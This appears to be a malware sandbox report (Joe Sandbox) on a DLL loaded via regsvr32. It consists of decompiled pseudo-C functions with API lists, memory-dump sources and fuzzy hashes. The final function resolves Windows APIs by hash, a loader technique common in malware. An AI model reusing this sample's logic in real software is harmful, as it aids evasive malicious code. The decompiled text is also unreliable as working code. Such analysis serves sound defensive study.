                                				_t68 =  *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + _t97 * 8));
                                				if (_t68 == 0) goto 0x130ef3a9;
                                				if (_t68 == _t92) goto 0x130ef421;
                                				goto 0x130ef41c;
                                				r8d = 0x800;
                                				LoadLibraryExW(_t121, _t119, _t116);
                                				if (_t61 != 0) goto 0x130ef3ea;
                                				GetLastError();
                                				if (_t61 != 0x57) goto 0x130ef3e8;
                                				r8d = 0;
                                				LoadLibraryExW(??, ??, ??);
                                				goto 0x130ef3ea;
                                				if (0 != 0) goto 0x130ef403;
                                				 *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + _t97 * 8)) = _t92;
                                				goto 0x130ef421;
                                				_t19 = 0x7ffc130e0000 + 0x44770 + _t97 * 8;
                                				_t65 =  *_t19;
                                				 *_t19 = 0;
                                				if (_t65 == 0) goto 0x130ef41c;
                                				FreeLibrary(_t113);
                                				if (0 != 0) goto 0x130ef476;
                                				if (__r8 + 4 != __r9) goto 0x130ef392;
                                				if (0 == 0) goto 0x130ef486;
                                				GetProcAddress(_t91);
                                				if (_t65 == 0) goto 0x130ef47f;
                                				_t107 =  *0x13123760; // 0xe67021d0ea18
                                				asm("loope 0x41");
                                				asm("dec eax");
                                				 *(0x7ffc130e0000 + 0x44810 + _t119 * 8) = _t65 ^ _t107;
                                				goto 0x130ef4a3;
                                				goto 0x130ef437;
                                				_t112 =  *0x13123760; // 0xe67021d0ea18
                                				asm("enter 0xd348, 0xcf");
                                				 *(0x7ffc130e0000 + 0x44810 + _t119 * 8) = _t92 ^ _t112;
                                				return r10d;
                                			}




















                                APIs
                                • GetProcAddress.KERNEL32(?,0000E67021D0EA18,00000007,00007FFC130EF647,?,?,00000000,00007FFC130EF1C7,?,?,0000E67021D0EA18,00007FFC130EE6A9), ref: 00007FFC130EF442
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID:
                                • API String ID: 190572456-0
                                • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction ID: b3c1aa9b45117998430089d8621a0ccc55ad2349ced2e3cb28d30a168b23aa20
                                • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction Fuzzy Hash: CE4128A2B0EE6981FE118B52A80027523D1BF04BF8F1A4939DD1D5B7C4EF3CE015C214
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 23%
                                			E00007FFC7FFC130F4EEC(void* __edx, long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                				long long _v32;
                                				long long _v40;
                                				void* _t12;
                                				int _t14;
                                				void* _t20;
                                				void* _t24;
                                
                                				_a8 = __rbx;
                                				_a16 = __rbp;
                                				_a24 = __rsi;
                                				if (__rcx != 0) goto 0x130f4f28;
                                				_t12 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t12);
                                				goto 0x130f4fc9;
                                				if (__rdx == 0) goto 0x130f4f11;
                                				E00007FFC7FFC130EF4C0();
                                				_v32 = 0;
                                				r15d = _t24;
                                				 *__rdx = 0;
                                				r15b = 0 == 0;
                                				_v40 = 0;
                                				r9d = r9d | 0xffffffff;
                                				_t14 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                				if (0 != 0) goto 0x130f4f6f;
                                				GetLastError();
                                				E00007FFC7FFC130EE630(r15d, 0, __rbx);
                                				goto 0x130f4f21;
                                				E00007FFC7FFC130EE154(0, _t14 + _t14);
                                				if (0 == 0) goto 0x130f4fbf;
                                				_v32 = r14d;
                                				r9d = r9d | 0xffffffff;
                                				_v40 = 0;
                                				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                				if (0 != 0) goto 0x130f4fb1;
                                				GetLastError();
                                				_t20 = E00007FFC7FFC130EE630(r15d, 0, 0);
                                				goto 0x130f4fbf;
                                				 *__rdx = 0;
                                				asm("invalid");
                                				return _t20;
                                			}










                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide$AllocHeap_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 2395940807-0
                                • Opcode ID: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction ID: bead81b311d4956a53ee90830fa4c9ec142b17a700b8c3690d425cc51ce643dc
                                • Opcode Fuzzy Hash: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction Fuzzy Hash: 5121B531B08F6A42FA149F66AD0013AA2D9AFC4BB8F150934ED5D637D5EE3CD464C220
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E00007FFC7FFC130F6400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                				void* _t24;
                                				signed char _t25;
                                				signed int _t30;
                                				signed int _t31;
                                				signed int _t32;
                                				signed long long _t39;
                                				signed long long _t40;
                                				signed int* _t48;
                                
                                				_a8 = __rbx;
                                				_a16 = __rsi;
                                				_t39 = _t40 & 0x0000001f;
                                				_t48 = _t40;
                                				if ((__ecx & 0x00000008) == 0) goto 0x130f6431;
                                				if (__edx >= 0) goto 0x130f6431;
                                				 *((intOrPtr*)(_t39 + 0x57ebf7e3)) =  *((intOrPtr*)(_t39 + 0x57ebf7e3)) + _t24;
                                				asm("adc [eax+0xf], ecx");
                                				 *((intOrPtr*)(_t39 + 0x3cebfbe3)) =  *((intOrPtr*)(_t39 + 0x3cebfbe3)) + _t24;
                                				_t30 = dil & 0x00000001;
                                				if (_t30 == 0) goto 0x130f6468;
                                				asm("dec eax");
                                				if (_t30 >= 0) goto 0x130f6468;
                                				 *((intOrPtr*)(_t39 + 0x20ebfee3)) =  *((intOrPtr*)(_t39 + 0x20ebfee3)) + _t24;
                                				_t31 = dil & 0x00000002;
                                				if (_t31 == 0) goto 0x130f6488;
                                				asm("dec eax");
                                				if (_t31 >= 0) goto 0x130f6488;
                                				_t32 = dil & 0x00000010;
                                				if (_t32 == 0) goto 0x130f6485;
                                				 *((intOrPtr*)(_t39 - 0x9bf021d)) =  *((intOrPtr*)(_t39 - 0x9bf021d)) + _t24;
                                				asm("invalid");
                                				if (_t32 == 0) goto 0x130f64a2;
                                				asm("dec eax");
                                				if (_t32 >= 0) goto 0x130f64a2;
                                				 *((intOrPtr*)(_t39 - 0x74b7101d)) =  *((intOrPtr*)(_t39 - 0x74b7101d)) + _t24;
                                				if (_t32 == 0) goto 0x130f64ca;
                                				asm("rol byte [ebp+0x5c8b48db], 0x24");
                                				 *_t48 =  *_t48 ^ __ecx;
                                				asm("ror byte [eax-0x7d], 0xc4");
                                				 *(_t48 - 0x3d) =  *(_t48 - 0x3d) & _t25;
                                			}












                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _set_statfp
                                • String ID:
                                • API String ID: 1156100317-0
                                • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction ID: 964fa575040371325d65a34880e014d11f59a0afc52581298c705295d34a18fa
                                • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction Fuzzy Hash: 8F11C426E18E3F0BF6542134DF4637911D96F453BCE080AB4E96E27AD6CE2D7461D231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: U
                                • API String ID: 2456169464-4171548499
                                • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction ID: c6116eb31599becb4ad0f909fe8d585fdfe02209de7472e901fd323701e8414b
                                • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction Fuzzy Hash: E941F622B1CA5982EB20CF25E8043BA77A4FB887A8F414031EE8DA7788DF3CD511C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E00007FFC7FFC130F20A8(void* __edx, void* __eflags, long long* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
                                				void* _t35;
                                				void* _t36;
                                				void* _t37;
                                				void* _t38;
                                				void* _t39;
                                				void* _t40;
                                				signed int _t41;
                                				signed char _t42;
                                				void* _t46;
                                				signed char _t47;
                                				void* _t49;
                                				void* _t52;
                                				void* _t59;
                                				signed int _t66;
                                				signed long long _t78;
                                				signed long long _t89;
                                				signed long long _t92;
                                				signed long long _t93;
                                
                                				_t49 = __edx;
                                				_a8 = __rbx;
                                				_a24 = __rbp;
                                				 *__rcx = 0;
                                				_t89 = _t92;
                                				r14d = r9d;
                                				_t93 = _t92;
                                				_t47 = _t46 - 1;
                                				if (__eflags == 0) goto 0x130f20f9;
                                				_t52 = _t89 - 1;
                                				if (_t52 == 0) goto 0x130f20f2;
                                				_t35 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				_t36 = E00007FFC7FFC130EE580(_t35);
                                				goto 0x130f211f;
                                				 *0xc0000000 =  *0xc0000000 + _t36;
                                				asm("pop es");
                                				 *_t93 =  *_t93 + _t47;
                                				 *_t93 =  *_t93 | _t47;
                                				 *_t92 =  *_t92 << 0xc8;
                                				asm("sbb eax, eax");
                                				goto 0x130f211f;
                                				 *_t93 =  *_t93 + _t36;
                                				 *0x80000000 =  *0x80000000 + _t36;
                                				_t78 = _t93 & _t89;
                                				if (_t52 == 0) goto 0x130f218b;
                                				if (_t78 == 0x100) goto 0x130f2184;
                                				if (_t78 == 0x200) goto 0x130f217d;
                                				if (_t78 == 0x300) goto 0x130f2176;
                                				if (_t78 == 0x400) goto 0x130f218b;
                                				if (_t78 == 0x500) goto 0x130f216f;
                                				if (_t78 == 0x600) goto 0x130f217d;
                                				_t59 = _t78 - _t89;
                                				if (_t59 == 0) goto 0x130f216f;
                                				_t37 = E00007FFC7FFC130EE6A0(_t78);
                                				 *_t78 = 0x16;
                                				_t38 = E00007FFC7FFC130EE580(_t37);
                                				goto 0x130f2190;
                                				 *0x1 =  *0x1 + _t38;
                                				asm("adc edi, [eax+0x5]");
                                				goto 0x130f2190;
                                				 *0x4 =  *0x4 + _t38;
                                				 *((intOrPtr*)(_t89 - 0x127cf7bd)) =  *((intOrPtr*)(_t89 - 0x127cf7bd)) +  ~_t47;
                                				asm("adc [edx+ecx*2-0x7d], dh");
                                				asm("in eax, dx");
                                				asm("adc [esi+edi-0x7d], dh");
                                				asm("in eax, dx");
                                				asm("adc [edx+esi-0x7d], dh");
                                				asm("in eax, dx");
                                				asm("adc [esi-0x7d], dh");
                                				asm("in eax, dx");
                                				if (_t59 == 0) goto 0x130f21be;
                                				_t39 = E00007FFC7FFC130EE6A0(0x4);
                                				 *0x4 = 0x16;
                                				_t40 = E00007FFC7FFC130EE580(_t39);
                                				goto 0x130f21e4;
                                				sil = __rcx[1] == 0x80000000;
                                				goto 0x130f21e4;
                                				 *0x4 =  *0x4 + _t40;
                                				 *0x2BE10EB00000004 =  *0x2BE10EB00000004 | _t93;
                                				goto 0x130f21e4;
                                				__rcx[5] = __rcx[5] & 0x00000000;
                                				bpl = 0x80;
                                				__rcx[3] = 0;
                                				__rcx[4] = 0x80;
                                				if ((bpl & dil) == 0) goto 0x130f21fd;
                                				 *__rcx =  *__rcx | 0x00000010;
                                				if ((_t93 & 0x00074000) != 0) goto 0x130f2222;
                                				_t41 = E00007FFC7FFC130F4DDC(_t49, 0x4,  &_a16);
                                				if (0x4 != 0) goto 0x130f229b;
                                				if (_a16 == 0x8000) goto 0x130f2225;
                                				 *__rcx =  *__rcx | bpl;
                                				_t42 = _t41 & r14d;
                                				if ((bpl & _t42) != 0) goto 0x130f2245;
                                				__rcx[4] = 1;
                                				_t66 = dil & 0x00000040;
                                				if (_t66 == 0) goto 0x130f2259;
                                				asm("bts dword [ebx+0x14], 0x1a");
                                				asm("bts dword [ebx+0x4], 0x10");
                                				__rcx[3] = __rcx[3] | 0x00000004;
                                				asm("bt edi, 0xc");
                                				if (_t66 >= 0) goto 0x130f2262;
                                				__rcx[4] = __rcx[4] | 0x00000100;
                                				asm("bt edi, 0xd");
                                				if (_t66 >= 0) goto 0x130f226d;
                                				asm("bts dword [ebx+0x14], 0x19");
                                				if ((dil & 0x00000020) == 0) goto 0x130f227a;
                                				asm("bts dword [ebx+0x14], 0x1b");
                                				goto 0x130f2285;
                                				if ((dil & 0x00000010) == 0) goto 0x130f2285;
                                				asm("bts dword [ebx+0x14], 0x1c");
                                				return _t42;
                                			}





















                                0x7ffc130f2250
                                0x7ffc130f2255
                                0x7ffc130f2259
                                0x7ffc130f225d
                                0x7ffc130f225f
                                0x7ffc130f2262
                                0x7ffc130f2266
                                0x7ffc130f2268
                                0x7ffc130f2271
                                0x7ffc130f2273
                                0x7ffc130f2278
                                0x7ffc130f227e
                                0x7ffc130f2280
                                0x7ffc130f229a

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                • String ID:
                                • API String ID: 72036449-0
                                • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction ID: a29df5b4091cd437e0b99f029867bc5ddfa8e1a5fa130d5ab96c2e0768c50546
                                • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction Fuzzy Hash: 6551A12AE0CE2F43F7A9692C8E0137A66DCBB50738F194475DB0D661D6CA2CE860C665
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 53%
                                			E00007FFC7FFC130EF0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                                				void* _t9;
                                				void* _t10;
                                				intOrPtr _t22;
                                				intOrPtr _t24;
                                				void* _t33;
                                				void* _t34;
                                
                                				_t16 = __rax;
                                				_a8 = __rbx;
                                				GetLastError();
                                				_t22 =  *0x13123888; // 0x7
                                				if (_t22 == 0xffffffff) goto 0x130ef0fe;
                                				E00007FFC7FFC130EF5BC(_t10, _t22 - 0xffffffff, __rax, __rax, _t22);
                                				if (__rax != 0) goto 0x130ef13f;
                                				asm("int1");
                                				asm("invalid");
                                				_t33 = __rax;
                                				if (__rax != 0) goto 0x130ef11e;
                                				E00007FFC7FFC130EE114(__rax, 0);
                                				goto 0x130ef15a;
                                				_t24 =  *0x13123888; // 0x7
                                				E00007FFC7FFC130EF614(_t10, __rax, __rax, __rax, _t24, __rax, _t34);
                                				if (__rax == 0) goto 0x130ef117;
                                				E00007FFC7FFC130EEE40(__rax, __rax);
                                				_t9 = E00007FFC7FFC130EE114(_t16, 0);
                                				if (_t33 == 0) goto 0x130ef15a;
                                				SetLastError(??);
                                				return _t9;
                                			}










                                APIs
                                • GetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF0DE
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF146
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF15C
                                • abort.LIBCMT ref: 00007FFC130EF162
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorLast$abort
                                • String ID:
                                • API String ID: 1447195878-0
                                • Opcode ID: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction ID: ce5543993cea57cd4835e1aa8729aae120ec9e7bb04bd31614269084bfa2f0fb
                                • Opcode Fuzzy Hash: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction Fuzzy Hash: 99019224B0AF6E42FA586774A55613821D18F487B8F25093CD91E267C2ED2CF869C230
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 48%
                                			E00007FFC7FFC130ED734(void* __ecx, void* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, long long _a16, signed int _a24, char _a32) {
                                				long long _v56;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t26;
                                				intOrPtr* _t48;
                                				long long* _t49;
                                				long long _t52;
                                				long long _t58;
                                				void* _t60;
                                				long long _t78;
                                				long long _t81;
                                				long long _t82;
                                				intOrPtr* _t83;
                                				void* _t87;
                                
                                				_t60 = __rcx;
                                				_a8 = __rbx;
                                				_t2 = _t60 - 1; // -1
                                				_t48 = _t2;
                                				r14d = __ecx;
                                				if (_t48 - 1 <= 0) goto 0x130ed768;
                                				_t26 = E00007FFC7FFC130EE6A0(_t48);
                                				asm("push cs");
                                				 *_t48 =  *_t48 + _t26;
                                				goto 0x130ed897;
                                				E00007FFC7FFC130F05F8();
                                				r8d = 0x104;
                                				GetModuleFileNameA(??, ??, ??);
                                				_t83 =  *0x13124950; // 0x7632a0
                                				 *0x13124960 = 0x131243e0;
                                				if (_t83 == 0) goto 0x130ed79f;
                                				if ( *_t83 != dil) goto 0x130ed7a2;
                                				_t49 =  &_a32;
                                				_a24 = 0;
                                				_v56 = _t49;
                                				r8d = 0;
                                				_a32 = 0;
                                				E00007FFC7FFC130ED514(0x131243e0, 0x131243e0, 0, 0, 0x131243e0, _t87, __r8,  &_a24);
                                				r8d = 1;
                                				E00007FFC7FFC130ED6D0(_a24, _a32, __r8);
                                				_t58 = _t49;
                                				if (_t49 != 0) goto 0x130ed7f3;
                                				E00007FFC7FFC130EE6A0(_t49);
                                				_t10 = _t58 + 0xc; // 0xc
                                				_t81 = _t10;
                                				 *_t49 = _t81;
                                				goto 0x130ed892;
                                				_v56 =  &_a32;
                                				E00007FFC7FFC130ED514(_t58, 0x131243e0, _t58, _t81, 0x131243e0, _t87, _t49 + _a24 * 8,  &_a24);
                                				if (r14d != 1) goto 0x130ed829;
                                				_t52 = _a24 - 1;
                                				 *0x13124940 = _t58;
                                				 *0x1312493c = _t52;
                                				goto 0x130ed7ec;
                                				_a16 = _t81;
                                				0x130efef4();
                                				if (_t52 == 0) goto 0x130ed858;
                                				E00007FFC7FFC130EE114(_t52, _a16);
                                				_a16 = _t81;
                                				E00007FFC7FFC130EE114(_t52, _t58);
                                				_t82 = _t52;
                                				goto 0x130ed897;
                                				_t78 = _a16;
                                				if ( *_t78 == _t82) goto 0x130ed873;
                                				if ( *((intOrPtr*)(_t78 + 8)) != _t82) goto 0x130ed867;
                                				 *0x1312493c = _t82 + 1;
                                				_a16 = _t82;
                                				 *0x13124940 = _t78;
                                				E00007FFC7FFC130EE114(_t78 + 8, 0);
                                				_a16 = _t82;
                                				return E00007FFC7FFC130EE114(_t78 + 8, _t58);
                                			}



















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileModuleName_invalid_parameter_noinfo
                                • String ID: C:\Windows\system32\regsvr32.exe
                                • API String ID: 3307058713-464481000
                                • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction ID: 7084bbd1c2dbe938e4b6161fd7881040c3d3f0c8cf2092391de03705d42cb1b7
                                • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction Fuzzy Hash: 8741C532B08E6A8AFB14DF2AE9400BD67E4EF44BA8B544035E94D27795DE3CE461C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: @
                                • API String ID: 3000768030-2766056989
                                • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction ID: 6415c3513bfa0acc29d9b14b9bef021f32f128830bf2c6f512498d681071529e
                                • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction Fuzzy Hash: B621F922A08F6A42FB64CB259D9013826D5EF45778F240375D6AE277D4CE3DE891D310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                [Control-flow graph of function 17b359e37e0 (legend: executed / not executed nodes); graph image not reproduced.]
                                C-Code - Quality: 41%
                                			E0000017B17B359E37E0(long long* __rax, long long __rcx, void* __r9) {
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t80;
                                				void* _t83;
                                				void* _t84;
                                				void* _t100;
                                				void* _t176;
                                				long long* _t222;
                                				long long* _t223;
                                				long long* _t224;
                                				long long _t225;
                                				intOrPtr _t226;
                                				long long* _t228;
                                				long long* _t229;
                                				void* _t230;
                                				void* _t288;
                                				long long _t289;
                                				void* _t291;
                                				void* _t294;
                                				intOrPtr _t295;
                                				intOrPtr _t296;
                                				void* _t300;
                                				void* _t301;
                                				void* _t303;
                                				void* _t310;
                                				void* _t313;
                                				long long _t314;
                                				void* _t315;
                                				void* _t316;
                                				long long _t319;
                                				long long* _t320;
                                				void* _t322;
                                				CHAR* _t327;
                                
                                				_t222 = __rax;
                                				 *((long long*)(_t300 + 8)) = __rcx;
                                				_t301 = _t300 - 0x248;
                                				_t292 =  *0x359ed458;
                                				_t295 =  *((intOrPtr*)( *0x359ed458 + 8));
                                				 *((long long*)(_t301 + 0x20)) =  *0x359ed448;
                                				 *(_t301 + 0x298) =  *0x359ed450;
                                				GetModuleHandleA(_t327);
                                				_t80 = E0000017B17B359E40F8(__rax,  *0x359ed458 + 0x18, _t303, _t313, _t322, _t319);
                                				r13d = 0;
                                				if (_t80 != r13d) goto 0x359e38bf;
                                				E0000017B17B359E908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t222 == _t319) goto 0x359e3866;
                                				 *_t222();
                                				goto 0x359e3869;
                                				_t223 = _t319;
                                				_t83 = E0000017B17B359E40F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288); // executed
                                				if (_t83 != r13d) goto 0x359e38bf;
                                				_t84 = E0000017B17B359E5FC8(_t223, _t230,  *0x359ed448 + 0x17b359f1082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
                                				if (_t84 != r13d) goto 0x359e38bf;
                                				if (E0000017B17B359E5FC8(_t223, _t230,  *0x359ed448 + 0x17b359f1079, _t292 + 0x20, _t292, _t295) != r13d) goto 0x359e38bf;
                                				if (E0000017B17B359E5FC8(_t223, _t230,  *0x359ed448 + 0x17b359f1092, _t292 + 0x30, _t292, _t295) != r13d) goto 0x359e3cc0;
                                				HeapAlloc(??, ??, ??);
                                				_t289 = _t223;
